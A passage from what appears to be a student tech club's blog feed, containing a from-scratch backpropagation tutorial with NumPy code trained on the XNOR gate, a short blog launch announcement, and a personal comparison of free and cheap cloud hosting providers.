c &= \frac{1}{4} \left((a_1-y_1)^2 + (a_2 - y_2)^2 + (a_3 - y_3)^2 + (a_4 - y_4)^2\right)
\end{aligned}
$$

As you can see, this is just a linear system much like the one shown in the earlier example, and in matrix form it becomes very simple.

$$ \begin{aligned} \mathbf{z} &= W\mathbf{x} + \mathbf{b}\\ \mathbf{a} &= \sigma(\mathbf{z}) \\ c &= \frac{1}{n} \|\mathbf{a} - \mathbf{y}\|^2_2 \end{aligned} $$
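A quick NumPy sketch of these three equations for $n=4$ (random values; sigmoid stands in for the placeholder $\sigma$):

```python
import numpy as np

rng = np.random.default_rng(0)
W = rng.normal(size=(4, 4))   # weights
b = rng.normal(size=(4, 1))   # biases
x = rng.normal(size=(4, 1))   # input vector
y = rng.normal(size=(4, 1))   # target vector

def sigmoid(t):
    return 1 / (1 + np.exp(-t))

z = W @ x + b                     # z = Wx + b
a = sigmoid(z)                    # a = sigma(z)
c = float(np.mean((a - y) ** 2))  # c = (1/n) ||a - y||^2

print(z.shape, a.shape, c)
```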

From our work earlier we know that:

$$ \begin{aligned} \frac{\partial \mathbf{z}}{\partial \mathbf{b}}&=I \\ \frac{\partial \mathbf{z}}{\partial \mathbf{x}}&= W \\ \frac{\partial c}{\partial \mathbf{a}} &= \frac{2}{n} \left(\mathbf{a} - \mathbf{y} \right)^\text{T} \end{aligned} $$

However, we have once again hit a speedbump. How do we find the derivative of a vector $\mathbf{z}$ with respect to a matrix $W$? The function is of the form $f:\mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m}$, hence the derivative will be a third-order tensor (colloquially, a 3D matrix). But for now we will use a trick to dodge third-order tensors, exploiting the nature of the function $W\mathbf{x}$. For this example I use $m=3$ and $n=2$, but it generalizes to any sizes.

$$
\begin{aligned}
\mathbf{z} &= W\mathbf{x} + \mathbf{b}\\
\begin{bmatrix}
{\mathbf{z}}_{1} \\
{\mathbf{z}}_{2} \\
{\mathbf{z}}_{3}
\end{bmatrix} &= \begin{bmatrix}
{w}_{11} & {w}_{12}\\
{w}_{21} & {w}_{22}\\
{w}_{31} & {w}_{32}
\end{bmatrix}
\begin{bmatrix}
{\mathbf{x}}_{1} \\
{\mathbf{x}}_{2}
\end{bmatrix}
+
\begin{bmatrix}
{\mathbf{b}}_{1} \\
{\mathbf{b}}_{2} \\
{\mathbf{b}}_{3}
\end{bmatrix} \\
&=
\begin{bmatrix}
{w}_{11}{\mathbf{x}}_{1} + {w}_{12}{\mathbf{x}}_{2} + {\mathbf{b}}_{1}\\
{w}_{21}{\mathbf{x}}_{1} + {w}_{22}{\mathbf{x}}_{2} + {\mathbf{b}}_{2}\\
{w}_{31}{\mathbf{x}}_{1} + {w}_{32}{\mathbf{x}}_{2} + {\mathbf{b}}_{3}
\end{bmatrix}
\end{aligned}
$$

We now calculate the individual derivatives of $\mathbf{z}$ with respect to $W$.

$$
\begin{aligned}
\frac{\partial \mathbf{z}_{1}}{\partial w_{11}}=\mathbf{x}_{1}\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{11}}=0\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{11}}=0\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{12}}=\mathbf{x}_{2}\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{12}}=0\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{12}}=0\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{21}}=0\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{21}}=\mathbf{x}_{1}\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{21}}=0\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{22}}=0\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{22}}=\mathbf{x}_{2}\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{22}}=0\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{31}}=0\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{31}}=0\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{31}}=\mathbf{x}_{1}\\
\frac{\partial \mathbf{z}_{1}}{\partial w_{32}}=0\quad
\frac{\partial \mathbf{z}_{2}}{\partial w_{32}}=0\quad
\frac{\partial \mathbf{z}_{3}}{\partial w_{32}}=\mathbf{x}_{2}
\end{aligned}
$$

We see that this is a pretty complex-looking tensor, but a majority of its values are 0, allowing us to pull off an epic hack: at the end we are essentially trying to get a single scalar value (the loss) and find its partial derivative with respect to $W$. There are some steps involved in getting from $\mathbf{z}$ to $c$, but for simplicity, instead of showing everything, we will condense all of them into a function $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$ defined as $c=f(\mathbf{z})$. In this case, we know the tensor values, we know the gradient, and we know what the derivative should be. Hence, we now just evaluate it and see if we can spot any property:

$$
\begin{aligned}
\frac{\partial c}{\partial W} &=
\mathbf{x}\frac{\partial c}{\partial\mathbf{z}}
\end{aligned}
$$

Wonderful, we have just found this amazing method, where we just add $\mathbf{x}$ to the front. Normally this method is not possible, but it works in this special case because we don't have to consider terms such as $\frac{\partial c}{\partial{\mathbf{z}}_{2}}\frac{\partial {\mathbf{z}}_{2}}{\partial{w}_{11}}$, since they are just 0. It helps us dodge all the possibilities of tensor calculus (at least for now) and makes the NumPy multiplication much easier. $f$ also generalizes to any vector-to-scalar function, not just the specific steps we take.
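We can sanity-check this rule numerically with central finite differences; a small self-contained NumPy check, with MSE against a fixed target standing in for the generic $f$:

```python
import numpy as np

rng = np.random.default_rng(0)
m, n = 3, 2
W = rng.normal(size=(m, n))
x = rng.normal(size=(n, 1))
b = rng.normal(size=(m, 1))
y = rng.normal(size=(m, 1))

def c_of(Wm):
    # c = f(z), with f chosen as MSE against the fixed target y
    z = Wm @ x + b
    return float(np.mean((z - y) ** 2))

z = W @ x + b
dc_dz = (2.0 / m) * (z - y).T   # numerator-layout row vector, 1 x m
analytic = x @ dc_dz            # the claimed dc/dW: x "added to the front", n x m

# central finite differences over every w_ij;
# numeric[j, i] holds dc/dw_ij, matching the transposed (numerator) layout
eps = 1e-6
numeric = np.zeros((n, m))
for i in range(m):
    for j in range(n):
        Wp, Wm_ = W.copy(), W.copy()
        Wp[i, j] += eps
        Wm_[i, j] -= eps
        numeric[j, i] = (c_of(Wp) - c_of(Wm_)) / (2 * eps)

print(np.allclose(analytic, numeric, atol=1e-5))
```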

The next speedbump is much easier to grasp than the last one: element-wise operations. Here we have the activation function $\sigma:\mathbb{R}^{n} \rightarrow \mathbb{R}^{n}$ or $\sigma:\mathbb{R} \rightarrow \mathbb{R}$. It is written like the sigmoid function, but it is just a placeholder: it can be any $\mathbb{R}$-to-$\mathbb{R}$ activation function, such as $\text{ReLU}(x) = \text{max}(x, 0)$, or whatever else research has turned up, such as SmeLU and GELU. Once again, we work it out for every single value, as shown below:
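
In NumPy, element-wise application comes for free, since `np.exp` and `np.maximum` operate on every entry; here is a tiny illustration (the function names are my own):

```
import numpy as np

# Element-wise application: the same scalar function hits every entry,
# so the output has the same shape as the input.
def sigmoid(x):
    return 1 / (1 + np.exp(-x))

def relu(x):
    return np.maximum(x, 0)

z = np.array([[-2.0], [0.0], [3.0]])
print(sigmoid(z).shape)  # (3, 1): shape is preserved
print(relu(z).ravel())   # [0. 0. 3.]
```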

$$
\begin{aligned}
\mathbf{a}=\sigma(\mathbf{z})&=
\begin{bmatrix}
\sigma({\mathbf{z}}_{1}) \\
\sigma({\mathbf{z}}_{2}) \\
\sigma({\mathbf{z}}_{3})
\end{bmatrix}
\end{aligned}
$$

Now, for the forty-eight-billionth time, we calculate the Jacobian by computing every individual derivative to find the general property of the operation.

$$
\begin{aligned}
\frac{\partial \mathbf{a}}{\partial \mathbf{z}} &=
\begin{bmatrix}
\frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{1}} & \frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{2}} & \frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{3}}\\
\frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{1}} & \frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{2}} & \frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{3}}\\
\frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{1}} & \frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{2}} & \frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{3}}
\end{bmatrix}\\
\frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{1}}&=\sigma^{'}(\mathbf{z}_{1})\quad
\frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{2}}=0\quad
\frac{\partial {\mathbf{a}}_{1}}{\partial{\mathbf{z}}_{3}}=0\\
\frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{1}}&=0\quad
\frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{2}}=\sigma^{'}(\mathbf{z}_{2})\quad
\frac{\partial {\mathbf{a}}_{2}}{\partial{\mathbf{z}}_{3}}=0\\
\frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{1}}&=0\quad
\frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{2}}=0\quad
\frac{\partial {\mathbf{a}}_{3}}{\partial{\mathbf{z}}_{3}}=\sigma^{'}(\mathbf{z}_{3})\\
\frac{\partial \mathbf{a}}{\partial \mathbf{z}} &=
\begin{bmatrix}
\sigma^{'}(\mathbf{z}_{1}) & 0 & 0\\
0 & \sigma^{'}(\mathbf{z}_{2}) & 0\\
0 & 0 & \sigma^{'}(\mathbf{z}_{3})
\end{bmatrix}
=diag(\sigma^{'}(\mathbf{z}))
\end{aligned}
$$

As you can see, the derivative reduces to this specific value. I have used the $diag$ operator, which converts a vector into a diagonal matrix. Finally, after all this derivation (mathematically and figuratively), we can use the chain rule to join everything together:
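
As a tiny aside (my own example), NumPy's `np.diag` does exactly this conversion, and multiplying a row vector by the resulting matrix just scales each entry:

```
import numpy as np

# np.diag turns a length-n vector into an n-by-n diagonal matrix;
# right-multiplying a row vector by it scales element-wise.
v = np.array([0.1, 0.2, 0.3])
D = np.diag(v)
row = np.array([[1.0, 1.0, 1.0]])
print(row @ D)  # [[0.1 0.2 0.3]]
```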

$$
\begin{aligned}
\frac{\partial c}{\partial \mathbf{b}}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial \mathbf{b}} &= \frac{2}{n}{(\mathbf{a}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z}))\\
\frac{\partial c}{\partial \mathbf{x}}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial \mathbf{x}} &= \frac{2}{n}{(\mathbf{a}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z}))W\\
\frac{\partial c}{\partial W}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial W} &= \frac{2}{n}\mathbf{x}{(\mathbf{a}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z}))
\end{aligned}
$$
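To gain some confidence in these formulas, here is a quick numerical spot-check (my own, not from the original post); the layer sizes and random seed are arbitrary, with $n = 3$ outputs:

```
import numpy as np

# Spot-check the closed-form gradients for one sigmoid layer with
# squared-error loss, against a finite-difference estimate.
rng = np.random.default_rng(1)
W = rng.standard_normal((3, 2))
b = rng.standard_normal((3, 1))
x = rng.standard_normal((2, 1))
y = rng.standard_normal((3, 1))
sig = lambda t: 1 / (1 + np.exp(-t))

def loss(W, b, x):
    a = sig(W @ x + b)
    return np.sum((a - y) ** 2) / 3   # n = 3

z = W @ x + b
a = sig(z)
# Shared row-vector factor (2/n)(a - y)^T diag(sigma'(z)):
common = (2 / 3) * (a - y).T @ np.diag((sig(z) * (1 - sig(z))).ravel())

dcdb = common        # shape (1, 3)
dcdx = common @ W    # shape (1, 2)
dcdW = x @ common    # shape (2, 3), the transpose of W's shape

# Finite-difference gradient with respect to each bias entry.
eps = 1e-6
num_db = np.array([(loss(W, b + eps * np.eye(3)[:, [k]], x) - loss(W, b, x)) / eps
                   for k in range(3)])
print(np.allclose(dcdb.ravel(), num_db, atol=1e-4))  # True
```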

Now that we have these simple formulas for the single-layer case, we can expand them to the multi-layer case.

$$
\begin{aligned}
\mathbf{a}_{0}&=\mathbf{x}\\
\mathbf{z}_{i}&={W}_{i-1}{\mathbf{a}}_{i-1} + \mathbf{b}_{i-1}\\
\mathbf{a}_{i}&=\sigma(\mathbf{z}_{i})\\
i &= 1,2,3,\dots,L\\
c&=\frac{1}{n}\|{\mathbf{a}_{L}-\mathbf{y}}\|_{2}^{2}
\end{aligned}
$$
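
This recurrence transcribes directly into a loop; as a quick illustration (not part of the original code), here it is with arbitrarily chosen layer sizes:

```
import numpy as np

# Forward pass straight from the recurrence: a_0 = x, then alternate
# affine maps and activations for layers 1..L.
sig = lambda t: 1 / (1 + np.exp(-t))
rng = np.random.default_rng(2)
sizes = [2, 3, 3, 1]                  # arbitrary choice: L = 3 layers
Ws = [rng.standard_normal((m, n)) for n, m in zip(sizes, sizes[1:])]
bs = [rng.standard_normal((m, 1)) for m in sizes[1:]]

a = rng.standard_normal((2, 1))       # a_0 = x
for W, b in zip(Ws, bs):
    z = W @ a + b                     # z_i = W_{i-1} a_{i-1} + b_{i-1}
    a = sig(z)                        # a_i = sigma(z_i)
print(a.shape)  # (1, 1)
```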

We can do the calculus for the $i$-th layer now, specifically for bias and weight using the chain rule.

$$
\begin{aligned}
\frac{\partial c}{\partial \mathbf{b}_{i-1}}=\frac{\partial c}{\partial \mathbf{a}_{L}}\frac{\partial \mathbf{a}_{L}}{\partial \mathbf{z}_{L}}\frac{\partial \mathbf{z}_{L}}{\partial \mathbf{a}_{L-1}}\cdots\frac{\partial \mathbf{a}_{i}}{\partial \mathbf{z}_{i}}\frac{\partial \mathbf{z}_{i}}{\partial \mathbf{b}_{i-1}}&=
\frac{2}{n}{(\mathbf{a}_{L}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z}_{L}))W_{L-1}\cdots diag(\sigma^{'}(\mathbf{z}_{i}))\\
\frac{\partial c}{\partial W_{i-1}}=\frac{\partial c}{\partial \mathbf{a}_{L}}\frac{\partial \mathbf{a}_{L}}{\partial \mathbf{z}_{L}}\frac{\partial \mathbf{z}_{L}}{\partial \mathbf{a}_{L-1}}\cdots\frac{\partial \mathbf{a}_{i}}{\partial \mathbf{z}_{i}}\frac{\partial \mathbf{z}_{i}}{\partial W_{i-1}}&=
\frac{2}{n}\mathbf{a}_{i-1}{(\mathbf{a}_{L}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z}_{L}))W_{L-1}\cdots diag(\sigma^{'}(\mathbf{z}_{i}))
\end{aligned}
$$

Now it is time to actually implement this network (finally).

I couldn't find a good but small dataset, because most people really do like large datasets and are infuriated when they are not provided one, like ~~entitled brats~~ normal people. So instead, I decided that we will train our neural network to mimic the XNOR gate.

Oh no! Training? Testing? What are those? In all fairness, I am simply trying to show you that the mathematical functions that dictate neural networks, as we derived above, fit this task perfectly, and that the neural networks everyone hears about really can just mimic any function.

For those who do not know, the XNOR gate's inputs and outputs are written above. It is pretty suitable for this example because the inputs and outputs are all 0s and 1s; hence it is fast to train and there is no bias in the data.
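
For reference, the whole truth table fits in a one-liner (my own snippet); it generates the same four pairs that the NumPy data list below encodes:

```
# XNOR outputs 1 exactly when both inputs agree.
xnor = lambda a, b: int(a == b)
table = [(a, b, xnor(a, b)) for a in (0, 1) for b in (0, 1)]
print(table)  # [(0, 0, 1), (0, 1, 0), (1, 0, 0), (1, 1, 1)]
```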

From here, let's try coding out the (x,y) pairs in NumPy:

```
data = [[np.array([[0],[0]], dtype=np.float64), np.array([[1]], dtype=np.float64)],
        [np.array([[0],[1]], dtype=np.float64), np.array([[0]], dtype=np.float64)],
        [np.array([[1],[0]], dtype=np.float64), np.array([[0]], dtype=np.float64)],
        [np.array([[1],[1]], dtype=np.float64), np.array([[1]], dtype=np.float64)]]
```

We then define a network structure. It doesn't have to be too complex because it is a pretty simple function. I decided on a $2 \rightarrow 3 \rightarrow 1$ multi-layer perceptron (MLP) structure, with the sigmoid activation function.

Next, let's try coding out our mathematical work based off the following class:

```
class NNdata:
    def __init__(self):
        self.a_0 = None
        self.W_0 = np.random.rand(3, 2)
        self.b_0 = np.random.rand(3, 1)
        self.z_1 = None
        self.a_1 = None
        self.W_1 = np.random.rand(1, 3)
        self.b_1 = np.random.rand(1, 1)
        self.z_2 = None
        self.a_2 = None
        self.db_1 = None
        self.dw_1 = None
        self.db_0 = None
        self.dw_0 = None

    def sigmoid(self, x):
        return 1 / (1 + np.exp(-x))

    def sigmoid_derivative(self, x):
        return self.sigmoid(x) * (1 - self.sigmoid(x))

    def feed_forward(self, x):
        self.a_0 = x
        self.z_1 = np.matmul(self.W_0, self.a_0) + self.b_0
        self.a_1 = self.sigmoid(self.z_1)
        self.z_2 = np.matmul(self.W_1, self.a_1) + self.b_1
        self.a_2 = self.sigmoid(self.z_2)
        return self.a_2

    def loss(self, y):
        return np.linalg.norm(self.a_2 - y)**2

    def back_prop(self, y):
        dcdz_2 = 2 * np.matmul((self.a_2 - y).T, np.diag(self.sigmoid_derivative(self.z_2).reshape(1)))
        dcdb_1 = dcdz_2
        dcdw_1 = np.matmul(self.a_1, dcdz_2)
        dcda_1 = np.matmul(dcdz_2, self.W_1)
        dcdz_1 = np.matmul(dcda_1, np.diag(self.sigmoid_derivative(self.z_1).reshape(3)))
        dcdb_0 = dcdz_1
        dcdw_0 = np.matmul(self.a_0, dcdz_1)
        self.db_1 = dcdb_1.T
        self.dw_1 = dcdw_1.T
        self.db_0 = dcdb_0.T
        self.dw_0 = dcdw_0.T
```

Next, I program gradient descent. When there are multiple datapoints, there are three kinds of gradient descent: stochastic, batch, and mini-batch. In Stochastic Gradient Descent (SGD), the weights are updated after every single sample, which obviously makes your steps towards the ideal value very chaotic. In Batch Gradient Descent, the weights are updated only after all the samples have been run, and the net step is the sum/average of all the $\nabla F(x)$, which is less chaotic, but steps are less frequent.

Of course, in real life, we can never know which algorithm is better without making assumptions about the data (the No Free Lunch theorem). A good compromise is Mini-Batch Gradient Descent, which is like Batch Gradient Descent but uses smaller chunks of the datapoints at every step. In this case, I use Batch Gradient Descent.
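
For illustration, here is a rough sketch (my own, not from the post) of how the three schemes differ; they only change how samples are grouped per weight update:

```
import numpy as np

# With N samples, each scheme just groups sample indices differently
# per update step; the gradient for a step is summed over its group.
rng = np.random.default_rng(3)
N, batch_size = 8, 2
indices = list(rng.permutation(N))

sgd_steps = [[i] for i in indices]            # 1 sample per update
batch_steps = [indices]                       # all samples per update
minibatch_steps = [indices[k:k + batch_size]  # fixed-size chunks per update
                   for k in range(0, N, batch_size)]

print(len(sgd_steps), len(batch_steps), len(minibatch_steps))  # 8 1 4
```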

```
nndata = NNdata()
learning_rate = 0.1
for i in range(10000):
    db_1_batch = []
    dw_1_batch = []
    db_0_batch = []
    dw_0_batch = []
    c = []
    for j in range(4):
        nndata.feed_forward(data[j][0])
        c.append(nndata.loss(data[j][1]))
        nndata.back_prop(data[j][1])
        db_1_batch.append(nndata.db_1)
        dw_1_batch.append(nndata.dw_1)
        db_0_batch.append(nndata.db_0)
        dw_0_batch.append(nndata.dw_0)
    if (i+1) % 1000 == 0:
        print("loss (%d/10000): %.3f" % (i+1, sum(c)/4))
    nndata.b_1 -= learning_rate * sum(db_1_batch)
    nndata.W_1 -= learning_rate * sum(dw_1_batch)
    nndata.b_0 -= learning_rate * sum(db_0_batch)
    nndata.W_0 -= learning_rate * sum(dw_0_batch)
```

Output:

```
loss (1000/10000): 0.245
loss (2000/10000): 0.186
loss (3000/10000): 0.029
loss (4000/10000): 0.007
loss (5000/10000): 0.003
loss (6000/10000): 0.002
loss (7000/10000): 0.002
loss (8000/10000): 0.001
loss (9000/10000): 0.001
loss (10000/10000): 0.001
```

Voila! We have officially programmed a neural network from scratch. Pat yourself on the back for reading through this. And of course, if you bothered to code this out, try porting it over to a different language like Java, JS, or even C (yikes, why would anyone subject themselves to that?).

In the next part, it is time for the actual hard part. Good luck!

A lot of people think I just collated a bunch of sources and rephrased them, and honestly, I walked into writing this thinking I would be doing just that. The problem is that most sources that have attempted this only cover the single-to-multi-perceptron layer case and not the multi-to-multi-perceptron case, which is pretty sad. The true math is hidden behind mountains of research papers that loosely connect to give the results of this blog post, and I am too incompetent to connect them by myself. So, I just did the math myself. (The math may not usually be presented this way, but it works, so it should be correct.) Yes, it was a bit crazy, and it destroyed me to my core. This was a great character-building moment for me. So these are the actual sources:

- https://numpy.org/
- https://en.wikipedia.org/wiki/Gradient_descent
- https://en.wikipedia.org/wiki/Matrix_calculus
- https://en.wikipedia.org/wiki/Tensor_calculus
- https://en.wikipedia.org/wiki/Ricci_calculus
- https://en.wikipedia.org/wiki/XNOR_gate
- CS5131 Notes (Special thanks to Mr Chua and Mr Ng)

(Excruciatingly edited by Prannaya)

]]>```
console.log("Hello, World!");
```

Jokes aside, while we don't have a fixed posting schedule presently, here are things you can expect: write-ups after our CTF events, medium-style articles by our members on the latest tech news, reflections and sharings on projects, or even musings from interesting experiences and events we hold for the school and community.

Now, if you're curious why this is a thing: my motivation for redesigning the AppVenture website (again) was that I hoped to make something simpler and more maintainable in the future. I actually thought the original website in Go was really nice, but because AppVenture is moving to TypeScript and Vue, it'll be difficult to find people who can continue to maintain it in the long term. I didn't like the next version in Nuxt.js, however, because with the little content we had, setting up a database felt like overkill. It also meant more annoying backups than just copying a git repository around. And that's how we ended up with Gridsome.

Since we're redesigning the site anyway, I thought it'd be a good chance to include more than just a project showcase. For an interest group, a blog seemed like a great chance for members to share any cool things they may be up to, especially with the new stuff launched this year, such as the cybersecurity division and monthly sharings. Of course, I can't predict how this will go, since it'll launch after I graduate. But I'm pretty optimistic about it.

If you're interested in this blog, stay tuned for more!

(Psst: If you're a nushie interested in writing something or simply cross-posting your articles here, feel free to contact us)

]]>- A static/dynamic website
- A backend API
- Miscellaneous self-hosted services like Nextcloud, Wallabag, AirSonic etc.
- Compute (Simulations, AI)
- Running a botnet

or other use cases, then it can be hard to choose which service to use, especially for the thinking self-hoster wishing to optimize their productivity. In fact, here is the list of cloud services I'll be covering in this post alone.

**Static webhosts**

- Vercel
- Netlify
- Surge.sh
- Github pages (+ Github actions)

**Big Cloud**

- Amazon Web Services (AWS)
- Google Cloud Products (GCP)
- Oracle Cloud

**Independent Virtual Private Server (VPS) Providers**

- DigitalOcean
- Linode
- Vultr

Thus, in this guide, I'll share some of my experiences with these products and my humble evaluation of performance, cost, and the strings attached. But first, let's find you your very own server for free.

Oracle, a company which has racked up many sins, has made amends and bestows upon users 200GB of boot volume, 24GB of RAM, and 4 OCPUs worth of server instances on its cloud platform. Well, technically, due to supposed resource limitations in their Singaporean datacentres, it will play coy and may or may not allow you to max out some of these limits. Oh, and you don't need to connect a credit card, unlike every other cloud provider.

To set up your own server, log in to your Oracle Cloud dashboard and click **Create a VM instance** under Launch Resources. Choose the **Ampere series** in the **Image and Shape** menu, make sure to save the private key for SSH, and check **Specify a custom boot volume size**, setting an amount as close to 200GB as it will allow. Note that in order to host stuff over the internet, you have to open your ports by configuring ingress rules on the Oracle Cloud interface and also configure the firewall on the server itself.

Although not as good a deal as Oracle's, through the GitHub Student Pack you can redeem $100 of DigitalOcean credits which last indefinitely, unlike the "$100 for 3 months" offers available by scouring for referral links online. With the updated pricing (billing is per hour), this will get you a 1GB server for 16 months or a 2GB server for 8 months. Alternatively, if you just want to blow it on compute resources (max. 8GB unless you request 16GB or the specialized droplets), then you might as well just use referral links.

Until the recent pricing updates to DigitalOcean, DigitalOcean, Linode, and Vultr had near-identical pricing; there wasn't much difference between the three for their lower-end servers, though Vultr had a few more options. But now, only Linode and Vultr retain the classic $5-a-month droplet, and they consistently beat DigitalOcean on price for each of the basic tier options.

**Linode Pricing**

**Vultr Pricing**

Linode and Vultr also offer a greater variety of specialized server options like those focused on memory or CPU or ones with special processors. If you are going to pay for a VPS, might as well pick either of these.

GCP stands out with its generous 90-day US$300 (S$400) free trial, and it is very flexible in the resources, specs, and processors you can allocate. But even with the credits, GPUs are only available on request. This may make GCP seem amazing for compute, but first, it's time for a tale of horror.

I had a project where I needed to run some CPU-intensive physics simulations. My team was on a tight schedule, with the deadline only a few days away, and we needed the output from a few thousand runs of the simulation. First, we ran it on a GCP instance with 24 E2 processors, with every other relevant setting maxed out. But while a regular computer would take 2m5s for 1 run and 5m21s for 12 runs with multithreading, only 100 runs were completed in 10 hours overnight on the GCP instance. Maybe it's because, as Google put it, "E2s fire in bursts", so we tried 8 C2s and then 8 N1s instead, but it didn't help. The following graph shows the peak in CPU usage when the script running the simulation is first started, and how CPU usage drops to zero and stays there after a while.

In the end, a humble 8GB DigitalOcean server finished 1.3k runs in 13 hours. A fair improvement.

While AWS is widely used by enterprises, I'd suggest looking at alternatives if they exist for your use case, as:

- It is easy to get accidental charges and wake up with a hefty bill since you need to connect a credit card.
- Free tier options aren't that great and usually have better alternatives elsewhere.
- Much more expensive than its competitors.

However, AWS Lambda (and maybe some other niche products) is pretty good and has a generous free tier, so it's cool in my book.

To summarize, we will now go over some specific use cases.

I want to host a static (generated) website.

If you have a simple HTML5 site you want to deploy fast, then surge.sh is a service that allows you to quickly host it with a domain like `victorious-drain.surge.sh`.

For anything more than that, you can either host it on GitHub Pages or use a service like Vercel or Netlify. GitHub Pages has neat features like extended support for Jekyll sites (which are pretty cool), and even statically generated websites (e.g. Hugo or Next.js apps) can be hosted on GitHub Pages using community-made GitHub Actions. GitHub Pages domains are also less shady. But there are some minor annoyances, like the interface being rudimentary, so it can be hard to troubleshoot issues with custom domain names or with building a project properly.

Netlify and Vercel are also quick to use and are more full-fledged hosting services. All you have to do is link your GitHub repository and they will take care of detecting the web framework, building, and deploying. Vercel domains look like `custom-name.vercel.app` while Netlify domains look like `custom-name.netlify.app`. Vercel also has site analytics, which Netlify locks behind a steep paywall.

tl;dr Use Vercel

I want to self-host services like file-hosting, media servers, or run a backend API like a discord bot.

Use a free Oracle cloud server. Next.

I want to run a CPU intensive simulation for a few days.

Find referral links online for DigitalOcean (90-day $100), Linode (60-day $100 credit) or Vultr (30-day $100) servers or just use your Oracle Cloud server.

Leveraging cloud services and exploiting the generosity of crazy big cloud providers lends itself well to the spirit of hacker culture, that is to say, the DIY ethic of finding creative or elaborate solutions to minor inconveniences. I've tried hooking up my Wolfram Mathematica client to a cloud compute server with Wolfram Language, and using Xming to interface with COMSOL hosted somewhere else (this didn't work). I could stay and preach the value and satisfaction of self-hosting, but I'll save that for another post. If you have anything you'd like to share regarding your experiences with cloud hosting, message me on Discord at `meecrob#8207`

or be sure to share it in the AppVenture server.